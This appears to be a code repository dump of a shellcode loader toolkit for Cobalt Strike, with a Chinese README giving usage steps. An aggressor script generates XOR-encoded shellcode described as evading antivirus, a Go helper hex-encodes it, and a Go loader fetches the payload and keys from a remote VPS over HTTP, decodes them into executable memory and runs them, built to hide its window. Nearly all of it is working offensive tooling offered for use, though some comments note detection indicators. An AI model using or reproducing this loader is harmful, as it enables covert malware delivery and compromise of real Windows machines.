├── .gitattributes ├── Bypass_make.cna ├── README.md ├── process_shellcode.go └── shellcode_loader.go /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Bypass_make.cna: -------------------------------------------------------------------------------- 1 | popup attacks{ 2 | item("&BypassShellCode",{Generator();}); 3 | } 4 | 5 | bind Ctrl+G{ 6 | Generator(); 7 | } 8 | 9 | sub Generator{ 10 | $dialog = dialog("Generator", %(listener => "" , bit => false), &build); 11 | drow_listener($dialog, "listener", "Listener: "); 12 | dialog_description($dialog, "该插件用于快速生成免杀的shellcode"); 13 | dbutton_action($dialog, "Generate"); 14 | drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload"); 15 | dialog_show($dialog); 16 | } 17 | 18 | sub build{ 19 | $a = $3["bit"] . ""; 20 | 21 | if ($3["bit"] eq "false"){ 22 | $system = "x86"; 23 | $arch = "386"; 24 | }else{ 25 | $system = "x64"; 26 | $arch = "amd64"; 27 | } 28 | 29 | $KEY_1 = rand(255); 30 | $KEY_2 = rand(255); 31 | $shell_code = shellcode($3["listener"], false, $system); 32 | $shell_code = split("",$shell_code); 33 | $arr = ""; 34 | 35 | for ($i = 0; $i < size($shell_code); $i++){ 36 | if ($i eq 0) { 37 | $arr = $arr .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2; 38 | } else { 39 | $arr = $arr . "," .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2; 40 | } 41 | } 42 | 43 | prompt_file_save("shellcode.txt", { 44 | $path = "$1"; 45 | $handle = openf("> $+ $1"); 46 | writeb($handle, "Key1: " . $KEY_1 . "\r\n"); 47 | writeb($handle, "Key2: " . $KEY_2 . 
"\r\n"); 48 | writeb($handle, $arr); 49 | closef($handle); 50 | show_message("save to $+ $1\r\nKey1: $KEY_1\r\nKey2: $KEY_2"); 51 | }); 52 | } 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 1. CS加载Bypass_make.cna插件,生成shellcode和加密key1、key2: 2 | "Attack" > "BypassShellCode" 3 | 4 | 2. 将得到的shellcode和key的值分别做加密: 5 | process_shellcode.exe shellcode > code.txt 6 | process_shellcode.exe key1 > k1.txt 7 | process_shellcode.exe key2 > k2.txt 8 | 9 | 3. 得到的三个结果分别手动保存为文件放在vps上 10 | code.txt 11 | k1.txt 12 | k2.txt 13 | 14 | 4. 修改shellcode_loader.go中的vps请求地址即可: 15 | ``` 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory") 21 | URI = "http://vps:80/" 22 | ) 23 | ``` 24 | 25 | 6. 编译go文件: 26 | go build -ldflags "-H windowsgui" shellcode_loader.go 27 | 28 | 7. 
运行shellcode_loader.exe即可
--------------------------------------------------------------------------------
/process_shellcode.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"encoding/hex"
	"os"
	"strings"
	"strconv"
)

// main turns the values written by Bypass_make.cna into a hex string on stdout.
// The single command-line argument is either a comma-separated list of decimal
// byte values (the XOR-encoded payload) or a single decimal value (one key).
// Every field goes through strconv.Atoi, is truncated to a byte, and the
// resulting byte slice is printed with hex.EncodeToString.
func main() {
	// os.Args[1] is read unconditionally: there is no argument-count check.
	param := os.Args[1]
	// A comma decides between the list form and the single-value form.
	isArr := strings.Contains(param, ",")
	if isArr {
		context := strings.Split(param, ",")
		size := len(context)
		dataArr := make([]byte, size)
		for i, v := range context {
			// Conversion errors are discarded; an unparsable field becomes 0.
			val, _ := strconv.Atoi(v)
			dataArr[i] = byte(val)
		}
		//fmt.Println(dataArr)
		// hexToString
		fmt.Println(hex.EncodeToString([]byte(dataArr)))
	} else {
		// Single value: same conversion, one-byte output.
		val, _ := strconv.Atoi(param)
		data := make([]byte, 1)
		data[0] = byte(val)
		//fmt.Println(data)
		// hexToString
		fmt.Println(hex.EncodeToString([]byte(data)))
	}
}
--------------------------------------------------------------------------------
/shellcode_loader.go:
--------------------------------------------------------------------------------
package main

import (
	"encoding/hex"
	"io/ioutil"
	"net/http"
	"syscall"
	"time"
	"unsafe"
)

// Win32 memory constants passed to VirtualAlloc in main.
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

// Process-wide state. kernel32!VirtualAlloc and ntdll!RtlMoveMemory are
// resolved at start-up (MustLoadDLL/MustFindProc panic if either is missing),
// and URI is the plain-HTTP base from which the three stage files are fetched.
// From a detection standpoint the fixed download host, the fixed file names
// (code.txt, k1.txt, k2.txt) and the 5 s delays between requests are the
// network-observable behaviour of this loader.
var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
	URI           = "http://xxx:80/download/"
)

// keys1 sleeps 5 s, fetches URI+"k1.txt", hex-decodes the response body and
// returns its first byte. The http.Get, ReadAll and DecodeString errors are
// all discarded, so an unreachable host or an empty body ends the process
// with a panic rather than a handled error (relevant when the download host
// is blocked or sinkholed).
func keys1() byte {
	time.Sleep(5 * time.Second)
	resp, _ := http.Get(URI + "k1.txt")
	defer resp.Body.Close()
	body, _ := ioutil.ReadAll(resp.Body)
	var tmp = string(body)
	x1, _ := hex.DecodeString(tmp)
	return x1[0]
}

// keys2 is identical to keys1 except that it fetches URI+"k2.txt"; the same
// discarded-error behaviour applies.
func keys2() byte {
	time.Sleep(5 * time.Second)
	resp, _ := http.Get(URI + "k2.txt")
	defer resp.Body.Close()
	body, _ := ioutil.ReadAll(resp.Body)
	var tmp = string(body)
	x1, _ := hex.DecodeString(tmp)
	return x1[0]
}

// main is the loader entry point. After a 5 s delay it downloads
// URI+"code.txt", hex-decodes it, XORs every byte with key1^key2 (obtained
// from keys1 and keys2, each after its own 5 s delay), copies the result into
// a freshly allocated RWX region via RtlMoveMemory, waits another 5 s and
// transfers control to that region through syscall.Syscall.
// Each stage is an observable indicator for defenders: three plain-HTTP GETs
// to one host spaced ~5 s apart, a private PAGE_EXECUTE_READWRITE allocation,
// and execution from non-image memory.
func main() {
	time.Sleep(5 * time.Second)
	resp, err := http.Get(URI + "code.txt")
	if err != nil {
		print(err)
		return
	}
	defer resp.Body.Close()
	// ReadAll and DecodeString errors are discarded here, unlike the Get error.
	body, _ := ioutil.ReadAll(resp.Body)
	var tmp = string(body)
	x1, _ := hex.DecodeString(tmp)

	var key1 byte = keys1()
	var key2 byte = keys2()
	var res []byte
	// Decode: each payload byte is XORed with both single-byte keys.
	for i := 0; i < len(x1); i++ {
		res = append(res, x1[i]^key1^key2)
	}
	// Reserve and commit one RWX region the size of the decoded payload.
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(res)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// syscall.Proc.Call always returns a non-nil error; success is recognised
	// only by matching the Windows success message text, and any other outcome
	// exits silently with status 0.
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	// Copy the decoded bytes into the RWX region.
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&res[0])), uintptr(len(res)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	time.Sleep(5 * time.Second)
	// Jump to the allocated region; syscall.Syscall is used purely as an
	// indirect call to addr with zero arguments.
	syscall.Syscall(addr, 0, 0, 0, 0)
}
--------------------------------------------------------------------------------